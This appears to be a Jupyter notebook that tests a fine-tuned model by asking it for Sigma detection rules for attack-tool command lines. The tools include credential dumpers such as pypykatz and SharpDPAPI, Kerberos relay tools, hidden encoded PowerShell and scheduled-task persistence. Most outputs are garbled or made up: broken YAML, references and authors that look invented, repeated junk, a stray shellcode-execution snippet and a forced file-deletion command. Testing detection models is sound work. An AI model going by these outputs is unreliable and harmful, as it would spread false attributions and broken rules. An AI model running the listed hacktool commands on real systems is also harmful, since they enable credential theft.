---------|----------
Command Line Detection | An 158a3a83564a"

### References:

* https://github.com/crackmapexec/crackmapexec
* https://www.crackmapexec.com/docs/cli-options/
* https://github.com/crackmapexec/crackmapexec/blob/master/crackmapexec/data/plugins/discovery/ad_ldap.py
* https://github.com/crackmapexec/crackmapexec/blob/master/crackmapexec/

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
/am51 /password

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
/am51 /password

### Response:
Input: \am51 \password
id: 95814318-d150-4056-9516-066277f1944b
status: test
description: |
    Detects am51.exe execution with the "-password" flag in order to hide the process window.
    This can be used to bypass AVs and other defenses that rely on window detection.
    This technique was used by APT29 and RATTacker.
references:
    - https://github.com/O365Lab/Detections/blob/8a43a77856c9528a70752e4933386d79285d16b5/Other/HideWindow.md
    - https://blog.talosintelligence.com/2022/05/rattacker-and-apt29-strike-again.html
    - https://www.crowdstrike.com/blog/stolen-laptops-used-by-rattacker-and-apt29-to-hijack-credential-dumping/
    - https://lolbas-project.github.io/lolbas/Binaries/Am51/
author: Christian Bongiorni,  @chris_bongiorni
date: 2022-06-07
modified: 2023-02-04
tags:
    - attack.defense-evasion
    - attack.t1027
    - attack.execution
logsource:
    category: process_crea

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\EDRSilencer.exe EDRSilencer.exe EDRSilencer

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\EDRSilencer.exe EDRSilencer.exe EDRSilencer

### Response:
Input: \EDRSilencer.exe EDRSilencer.exe EDRSilencer
id: f55e2615-3870-40f2-8f11-81702a154b78
status: test
description: Detects EDRSilencer.exe which can be abused to disable EDRs.
references:
    - https://threatpost.com/edr-silencing-tool-used-by-nation-state-threat-actor/145478/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-14
modified: 2023-02-09
tags:
    - attack.defense-evasion
    - attack.t1027
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\EDRSilencer.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium



---



### EDRSilencer Execution

!image /thumbnail /rotate /format /aspect /height /width /pixel /quality /page /offset /crop /border /interpolate /resize /scale /trim /blur /color /gray /contrast /brightness /hue /quality /auto_ori

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-NoP -sta -NonI -W Hidden -Enc -noP -sta -w 1 -enc -NoP -NonI -W Hidden -enc -noP -sta -w 1 -enc -enc SQB -nop -exec bypass -EncodedCommand

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-NoP -sta -NonI -W Hidden -Enc -noP -sta -w 1 -enc -NoP -NonI -W Hidden -enc -noP -sta -w 1 -enc -enc SQB -nop -exec bypass -EncodedCommand

### Response:
This rule detects all legitimate parameters for PowerShell.
If any of these are missing from the command line, it will trigger.

### Notes:
- Input parameter should be in the following format: -param name value (e.g. -enc 1 -nop 1 -sta 1 -w 1)


```python
# Author: Nasreddine Bencherchali (Nextron Systems)
# Licensing: Public Domain
# Rereference: https://lolbas-project.github.io/lolbas/Binaries/PowerSploit/

import re
from lib.common import helpers


class PowerSploitPwshInteg(object):
    def __init__(self, timeout=60, signtype='pwsh', module='PwshInteg', name='Powershell Integration', author='Nextron Systems', description='Detects the use of PowerShell to launch an integrated commandline utility.', reputation='untrusted', references=[], type='command_line_signature',

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\ruby.exe -i -u -p

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\ruby.exe -i -u -p

### Response:
The given command line is used to launch a process.
Based on the parameters, the process will be started as interactive, unattended, or passive.
This will allow the user to decide if the process should run in interactive mode (with a visible console), unattended (no console), or passive (no console).





### Reference:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start-start-a-process
    - https://www.slideshare.net/heirhabarner/hunting-for-malware-in-windows-10-using-powershell
    - https://eqllib.readthedocs.io/en/latest/analytics/656e565e-7f3e-11e8-b236-83e66e851280.html
    - https://app.huntress.io/hunts/74e1374f-7f3e-11e8-b236-83e66e851280/
    - https://www.huntress.io/hunts/3d709a90-7f3f-11e8-b236-83e66e851280/
    - https://www.huntress.io/hunts/09602e90-7f3f-11e8-b236-83e66e851280/
    - https://www.huntress.io/hunts/08a06b90-7f3f-11e

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\hashcat.exe -a -m 1000 -r

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\hashcat.exe -a -m 1000 -r

### Response:
Input: \hashcat.exe -a -m 01000 -r
id: 12a5d87f-9b65-4d8b-972e-3a38856a4c61
status: test
description: Detects the execution of hashcat with a weak password hash, which may indicate the target system is compromised
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6053c2c335537c637058a3a109d/atomics/T1557.002/T1557.002.md
author: frack113
date: 2021-11-04
modified: 2023-02-04
tags:
    - attack.credential-access
    - attack.t1557.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'hashcat.exe'
            -'-a'
            -'-m'
            - '01000'
            -'-r'
    condition: selection
falsepositives:
    - Other types of password cracking
level: medium

---

### ATT&CK Detections

| Name | Description | Confidence |
| --- | --- | --- |
| T1557.002 | Weak P

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\htran.exe \\lcx.exe .exe -tran .exe -slave

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\htran.exe \lcx.exe .exe -tran .exe -slave

### Response:
17.03.2018.04:23:06.312 info \htran.exe \lcx.exe.exe -tran.exe -slave
title: HTRan Execution
id: 8288861d-a181-4979-985d-18d84f1f1914
status: test
description: Detects HTRan child process spawned by a binary with a "tran" flag (HTRan is a Windows tool for transferring files).
references:
    - https://twitter.com/Oddvarmoe/status/836733424358812672
    - https://twitter.com/mrchipmuffin/status/837737536878902784
author: Florian Roth (Nextron Systems), @NextronSystems, SCYTHE
date: 2017-12-01
modified: 2021-12-05
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\htran.exe'
            - '\lcx.exe'
        CommandLine|contains:
            - '-tran'
            - '-slave'
    condition: selection
falsepositives:
    - False positives depend on the activity bein

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
-u -p ^USER^ ^PASS^

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
-u -p ^USER^ ^PASS^

### Response:
For every command line argument containing USER or PASS flag, the corresponding value of the argument will be printed on the screen.

### Solution:
Disable the command line printing by specifying the "no_print_cmd_line" flag.

### References:
https://www.elastic.co/guide/en/security/current/command_line_printing.html#command-line-printing

### Detection:
Selection | _id: 579c7926-4484-4264-b9a5-369faf591d00
Status | test
Description | Adversaries may attempt to gather sensitive information by directly interfacing with a remote access tool (i. package). 
In order to perform this activity, an adversary must already have access to an interactive command shell. 
Remote access tools commonly used for this activity include BitTorrent, CryptoTorrent, FileZilla, GNU Screen, MobaXterm, OpenSSH, PuTTY, and WinSCP. 
To avoid alerts from the tool being used, disable command line printing as a counte

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
set && mshta vbscript:createobject .run (window.close)

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
set && mshta vbscript:createobject .run (window.close)

### Response:
Input: set && mshta vbscript:createobject.run (window.close)
Title: HackTool - HackTool Execution
Description: Detects execution of HackTool
References:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6055e3631c33606e8bb9f6a6cf/atomics/T1218/T1218.md
Author: Nasreddine Bencherchali (Nextron Systems)
Date: 2022-03-28
Modified: 2024-12-22
Tags:
    - Attack.Execution
    - Attack.T1218
    - Attack.DefenseEvasion
    - Sigma
    - T1218
    - Windows
LogSource:
    product: windows_sysmon
    description: 'Monitor process creation for "set" and "mshta" flags'
    data:
        - 'EventID: 13 - Image:'
        - 'ProcessAccess: CreateProcess'
    revision: 2
    field:
        - OriginalFileName
        - Image
        - ParentImage
        - ParentCommandLine
    condition:
        all_of:
            - OriginalFileName:
           

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
&&set cmd /c -f {0} {1} {2} {3} {4} {5}

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
&&set cmd /c -f {0} {1} {2} {3} {4} {5}

### Response:
Input:
\path\to\file.exe "c"o"n"s"o"l"e"."p"l"a"t"e"f"o"r"m"a"t"e"."e"x"e" /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e x e /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e xe /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m a t e. e xe /c start cmd /c -f path\to\file.exe c o n s o l e. p l a t e f o r m 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe \\xcopy.exe powershell.exe .bat.exe \\xcopy.exe pwsh.exe .bat.exe \\attrib.exe +s +h .bat.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe \xcopy.exe powershell.exe .bat.exe \xcopy.exe pwsh.exe .bat.exe \attrib.exe +s +h .bat.exe

### Response:
An execution of powershell.exe via cmd.exe could indicate a potential command injection scenario.
References:
    https://twitter.com/mr_future/status/1105223863648634369
    https://lolbas-project.github.io/lolbas/Binaries/Attrib/
    https://twitter.com/x86b0x/status/1326831098314045447

author: frack113
references:
    - https://twitter.com/mr_future/status/1105223863648634369
    - https://lolbas-project.github.io/lolbas/Binaries/Attrib/
    - https://twitter.com/x86b0x/status/1326831098314045447
    - https://learn.microsoft.com/en-us/sysinternals/downloads/attrib
    - https://github.com/0x4rt3mis/hacktool/blob/5992d366f5b3e3e985d6b75766c09663e45cf7c0/hacktool/attrib.py
date: 2021-05-21
modified: 2023-02-28
tags:
    - attack.defense-evasion
    - attack.t1218
logsource:
    category: process_creation
 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\cmd.exe Cmd.Exe /q /c chcp

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\cmd.exe Cmd.Exe /q /c chcp

### Response:
Input: \cmd.exe Cmd.Exe /q /c chcp
id: 97f9a32d-a62a-43d9-a704-97495639d42c
status: test
description: Detects execution of "chcp" by "cmd" to set the console codepage
references:
    - https://twitter.com/bohops/status/1373909979394743299
    - https://lolbas-project.github.io/lolbas/Binaries/Chcp/
author: 'Freddie Chopin (@Ohpensource), RP'
date: 2020-10-16
modified: 2022-11-18
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'chcp'
            - '/c'
        OriginalFileName: 'cmd.exe'
    condition: all of (selection)
falsepositives:
    - Legitimate usage of chcp
    - if there are more than 30 child processes for a given parent, this may be a suspicious behavior
level: medium




































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\KrbRelayUp.exe KrbRelayUp.exe relay -Domain -ComputerName krbscm -sc spawn -d -cn -cp

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\KrbRelayUp.exe KrbRelayUp.exe relay -Domain -ComputerName krbscm -sc spawn -d -cn -cp

### Response:
use: process_creation
process_name: KrbRelayUp.exe
parent_process: relay
original_file_name: KrbRelayUp.exe
command_line:
    - original_file_name: KrbRelayUp.exe
    - spawn:
        - domain:
            - name: Domain
            - value: '{{Domain}}'
        - computer_name:
            - name: ComputerName
            - value: '{{ComputerName}}'
        - sc:
            - name: Sc
            - value: '{{Sc}}'
        - name: Name
        - value: '{{Name}}'
        - cp:
            - name: Cp
            - value: '{{Cp}}'

id: 48f15172-3c0a-44c5-a269-a42447f9737e
status: test
description: |
    Detects the use of KrbRelayUp, which allows a user to impersonate another user based on the Kerberos ticket.
    KrbRelayUp is often used by attackers in lateral movement, impersonation, or credential theft.
references:
   

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\RemoteKrbRelay.exe RemoteKrbRelay.exe -clsid -target -victim -smb --smbkeyword interactive secrets service-add -rbcd -cn --computername -chp -chpPass -chpUser -addgroupmember -group -groupuser

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\RemoteKrbRelay.exe RemoteKrbRelay.exe -clsid -target -victim -smb --smbkeyword interactive secrets service-add -rbcd -cn --computername -chp -chpPass -chpUser -addgroupmember -group -groupuser

### Response:
RemoteKrbRelay.exe execution with interesting flags
References:
    - https://twitter.com/mrd0x/status/1414681223440441604
    - https://twitter.com/mrd0x/status/1414682890135642112
    - https://twitter.com/mrd0x/status/1414689729653529600
    - https://www.sans.org/blog/remote-kerberos-relay-tool-attack-in-the-wild/
Author: Florian Roth (Nextron Systems)
Workflow: one_shot
EntryPoint: OneShot
Status: test
Description: Detects the execution of RemoteKrbRelay which allows an attacker to relay Kerberos tickets through untrusted hosts
References:
    - https://twitter.com/mrd0x/status/1414681223440441604
    - https://twitter.com/mrd0x/status/1414682890135642112
    - https://twitter.com/mrd0x/status/141468972965352960

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\powershell.exe \\pwsh.exe \\schtasks.exe /Create powershell.exe -NonI /TN Updater /TR /SC ONLOGON /SC DAILY /ST /SC ONIDLE /SC HOURLY

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\powershell.exe \pwsh.exe \schtasks.exe /Create powershell.exe -NonI /TN Updater /TR /SC ONLOGON /SC DAILY /ST /SC ONIDLE /SC HOURLY

### Response:
Drop to an admin shell and run following command to see the task:
schtasks /query /v /tn Updater

### Note:
This technique is used by ransomware such as WinRansomware or APT32 to install a scheduled task for persistence.

### Detection:
This is an advanced technique to avoid detection by normal AV based on the fact that the task creation is performed within a powershell script.

Consider the following example that creates a scheduled task and immediately deletes the script used to create the task:

\schtasks.exe /Create powershell.exe -NonI /TN Updater /TR /SC ONLOGON /SC DAILY /ST /SC ONIDLE /SC HOURLY
powershell.exe -NonI -Command "schtasks /Create powershell.exe -NonI /TN Updater /TR /SC ONLOGON /SC DAILY /ST /SC ONIDLE /SC HOURLY"
del /f /q /s /a:s schtasks.exe





### Po

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
PurpleSharp.exe xyz123456.exe PurpleSharp

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
PurpleSharp.exe xyz123456.exe PurpleSharp

### Response:
Input:
\PurpleSharp.exe xyz123456.exe

Response:
\PurpleSharp.exe xyz123456.exe

id: 003a6715-7f98-49d1-b7dd-03f82e9277a6
status: test
description: Detects the use of PurpleSharp, a Windows post exploitation collection tool.
references:
    - https://twitter.com/PurpleSharp/status/1286717463165647623
    - https://github.com/mrd0x/PurpleSharp
author: Timur Yuzhaninov, oscd.community
date: 2021-09-04
modified: 2023-02-13
tags:
    - attack.defense-evasion
    - attack.t1036.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\PurpleSharp.exe'
            - '\xyz123456.exe'
    condition: selection
falsepositives:
    - Unlikely
level: medium


---







### Data Model

| Name | Type | Description |
| ------ | ---- | ----------- |
| FileName | String | The name of the original file that w

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\pypykatz.exe \\python.exe live registry

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\pypykatz.exe \python.exe live registry

### Response:
@operator: (live|registry)
path: (pypykatz.exe|python.exe)

id: 38642c46-f636-4293-899f-543967825525
status: test
description: Detects the usage of Pypykatz to dump the passwords of windows accounts.
references:
    - https://github.com/GossiTheDog/P """"""""""""""""
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-01-01
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'pypykatz.exe'
            - 'python.exe'
        CommandLine|contains:
            - 'live'
            -'registry'
    condition: selection
falsepositives:
    - False positives are unknown. Please report them to the author.
level: medium



---






































































































In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\QuarksPwDump.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\QuarksPwDump.exe

### Response:
For further investigation, the following files/processes were identified:
\QuarksPwDump.exe - QuarksPwDump.exe - Copy of Sysinternals PwDump

### Notes:
The original QuarksPwDump.exe binary was taken from: https://github.com/syssecb/quarks/blob/main/QuarksPwDump.exe?raw=true
The original PwDump.exe binary was taken from: https://github.com/sysinternals/pwdump/blob/master/binaries/pwdump.exe?raw=true


#### Sigma Rule:
Input: \QuarksPwDump.exe
id: 8c22131b-e92c-45f4-9454-f86bba847265
status: test
description: Detects use of QuarksPwDump.exe, an alternative to PwDump.exe from Sysinternals that is used to extract the plain text password from LSA database
references:
    - https://github.com/syssecb/quarks
    - https://lolbas-project.github.io/lolbas/LolbasMd/QuarksPwDump/
    - https://gist.github.com/helfik/7c287b454fed8944855171242460a71b
author: Nasreddine Bencherchali (Nextron Systems)
d

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\SafetyKatz.exe SafetyKatz.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\SafetyKatz.exe SafetyKatz.exe

### Response:
\SafetyKatz.exe SafetyKatz.exe {0003}
title: Process Created by SafetyKatz
id: 2c012858-061d-427a-958c-515c633b3d46
related:
    - id: 2c012858-061d-427a-958c-515c633b3d46
      type: derived
status: test
description: Detects the creation of a process by SafetyKatz.exe
references:
    - https://github.com/LOLBAS-Project/LOLBAS/blob/612e39819847319e21e86180a711772090a8b3b7/escript/safetykatz.py
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-14
tags:
    - attack.execution
    - attack.t1566
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\SafetyKatz.exe'
        - OriginalFileName: 'SafetyKatz.exe'
    selection:
        CommandLine|contains|all:
            -'sc'
            -'reg'
            - 'whoami'
            - 'wmic'
            - 'powershell'
            - 'wscript'
            - 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
PasswordDump.exe PasswordDump.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
PasswordDump.exe PasswordDump.exe

### Response:
Input: \PasswordDump.exe \PasswordDump.exe
id: 337f68f6-b664-4524-8c4b-1248b0228917
status: test
description: Detects usage of PasswordDump, a tool for dumping data from LSASS process
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3df3345e6a16f77b/atomics/T1558.001/T1558.001.md
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3df3345e6a16f77b/atomics/T1558.002/T1558.002.md
author: frack113
date: 2022-01-22
modified: 2023-02-24
tags:
    - attack.credential-access
    - attack.t1003.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\PasswordDump.exe'
    condition: selection
falsepositives:
    - Unlikely
level: medium


```












    ## Below is the new way of defining rules.
    ## Detects usage of PasswordDump, a tool for 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\SharPersist.exe -t schtask -c -t startupfolder -c -t reg -c -m add -t service -c -m add -t schtask -c -m add

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\SharPersist.exe -t schtask -c -t startupfolder -c -t reg -c -m add -t service -c -m add -t schtask -c -m add

### Response:
modify: data/scripts/hunts/persistent_schtask.yml

input:
    - title: Create Persistent Scheduled Task Via SharPersist
      id: 94b032e4-1f1d-4b5d-97f9-bf89e8222ee7
      status: test
      description: |
        Detects the use of "SharPersist" to create a persistent scheduled task.
        When used with the "-t" parameter, "SharPersist" can be used to create a persistent scheduled task.
        Adversaries can use this technique to run code at a specified time.
        This technique can bypass applocker policies and by using SharPersist, adversaries can create tasks that bypass the 32 bit and 64 bit restrictions.
        The task can be created with the "-m" parameter to specify the desired method (reg,service,schtask)
        This technique is used by many threat actors, including the Coin Mi

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\SharpLdapWhoami.exe SharpLdapWhoami

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\SharpLdapWhoami.exe SharpLdapWhoami

### Response:
Not Implemented

### Notes:
Not Implemented

## Atomic Tests

- Atomic Test #1 - LdapDomainReconnaissance
Leverages SharpLdapWhoami to identify domain and domain controllers for a given domain name
Input: Domain name: example.com
Output: Display name, domain name, domain sid, domain dns name, and domain forest name of domain

**Supported Platforms:** Windows



### Test Script

```powershell
$DomainName = $args[0]
if (($DomainName -eq "") -or (!$DomainName)) {
    Write-Host -ForegroundColor Red "Domain name is required"
    exit 1
}
if ($env:PROCESSOR_ARCHITECTURE -eq "AMD64") {
    $Shell = New-Object -ComObject Shell.Application
    $DllPath = $Shell.Namespace(17).Items() | Where-Object {$_.Name -eq "SharpLdapWhoami.dll"}
    if (-not $DllPath) {
        Write-Host -ForegroundColor Red "Could not find SharpLdapWhoami.dll"
        exit 1
    import-module $DllPath.Path

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\SharpChisel.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\SharpChisel.exe

### Response:
@load lib_util
@load lib_shellexec

input_files = lib_util.get_file_lines(context)

for file in input_files:
    if file:
        result = lib_shellexec.execute_binary(file)
        if result.return_code!= 0:
            continue
        else:
            lib_util.log_info(f"Shellcode {result.stdout} executed successfully")
            continue

title: Potential Shellcode Execution
id: d1038513-13a7-4178-b8e8-5043f0681e0a
status: test
description: Detects the execution of shellcode via "SharpChisel"
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da736c4da230da3da00565cbf0a1518e8d/atomics/T1140/T1140.md
    - https://github.com/cube0x0/SharpChisel
author: 'hYs3d_'
date: 2022-04-04
modified: 2023-02-04
tags:
    - attack.execution
    - attack.defense-evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|end

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\SharpDPAPI.exe SharpDPAPI.exe backupkey blob certificates credentials keepass masterkeys rdg vaults { }: /file: /machine /mkfile: /password: /pvk: /server: /target: /unprotect

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\SharpDPAPI.exe SharpDPAPI.exe backupkey blob certificates credentials keepass masterkeys rdg vaults { }: /file: /machine /mkfile: /password: /pvk: /server: /target: /unprotect

### Response:
log: \SharpDPAPI.exe -machine -mkfile: -password: -pvk: -server: -target: -unprotect
id: f9621955-566e-4c42-801d-f3b06a0c9075
status: test
description: |
  Detects usage of SharpDPAPI, a.NET implementation of the DPAPI, to discover and/or steal credentials and secrets from the target systems.
  Attackers can use this to dump the master keys used to encrypt various credentials on the target system.
references:
    - https://www.linkedin.com/pulse/hunting-for-secrets-in-the-dark-world-of-cybercrime-jay-santos/
    - https://github.com/codingshay/sharpdpapi
    - https://github.com/SecureAuthCorp/impacket/blob/master/examples/dpapi.py
author: 'Oddvar Moe, @secureauth, @codingshay'
date: 2021-12-14
modified: 2022-08-15
tags:
    - attack

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
\\SharpLDAPmonitor.exe SharpLDAPmonitor.exe /user: /pass: /dcip:

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
\SharpLDAPmonitor.exe SharpLDAPmonitor.exe /user: /pass: /dcip:

### Response:
Database Connections: \SharpLDAPmonitor.exe SharpLDAPmonitor.exe /user: /pass: /dcip:

### Detection:
Detect based on the string matching the above criteria.

### Based On:
- https://github.com/LOLBAS-Project//blob/28503622a90c395e2c043723c06305892779b741/escalation-mechanisms/ldap-connection. 

### Unit Tests:

Input: \SharpLDAPmonitor.exe SharpLDAPmonitor.exe /user: /pass: /dcip:
Output:
'''
{
    "callout": "LdapConnection",
    "input": "\\SharpLDAPmonitor.exe SharpLDAPmonitor.exe /user: /pass: /dcip:",
    "name": "LdapConnection",
    "condition": "select * from callout where callout in('LdapConnection') and input like '%/user:%' and input like '%/pass:%' and input like '%/dcip:%'"
}
'''

### Tactics:
- Privilege Escalation

### Strategies:
- Obfuscated Credentials
- Alternate Path

### Known False Positives:
Unknown

### Potential False 

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
--buildcache --bhdump --certdump --dnsdump -c --cachefilename -o --outputdirectory

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

### Instruction:
Write Sigma rule to detect payload:

### Input:
--buildcache --bhdump --certdump --dnsdump -c --cachefilename -o --outputdirectory

### Response:
Input:
    --buildcache --bhdump --certdump --dnsdump -c --cachefilename -o --outputdirectory

Title: Suspicious Command Line Arguments for Certdump.exe
Id: 919d9531-d7d7-4b86-8113-f945b7d0996f
Status: test
Description: Detects command line arguments for certdump.exe that may indicate a possible threat actor
References:
    - https://twitter.com/SBousseaden/status/1239955586021732501
    - https://twitter.com/SBousseaden/status/1239955679673948928
    - https://twitter.com/SBousseaden/status/1239955818995694082
    - https://twitter.com/SBousseaden/status/1239956001367546369
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil-exe-certutil
    - https://twitter.com/SBousseaden/status/1240212194388202240
    - https://github.com/elastic/elastic-stack-docs/blob/44e478141e184d85c75852a3

In [ ]:
prompt = """### Instruction:
Write Sigma rule to detect payload:

### Input:
TruffleSnout.exe \\TruffleSnout.exe

### Response:
"""

# Sinh kết quả
output = pipe(prompt, max_new_tokens=1000, do_sample=True, temperature=0.8, top_p=0.95)[0]["generated_text"]
print(output)

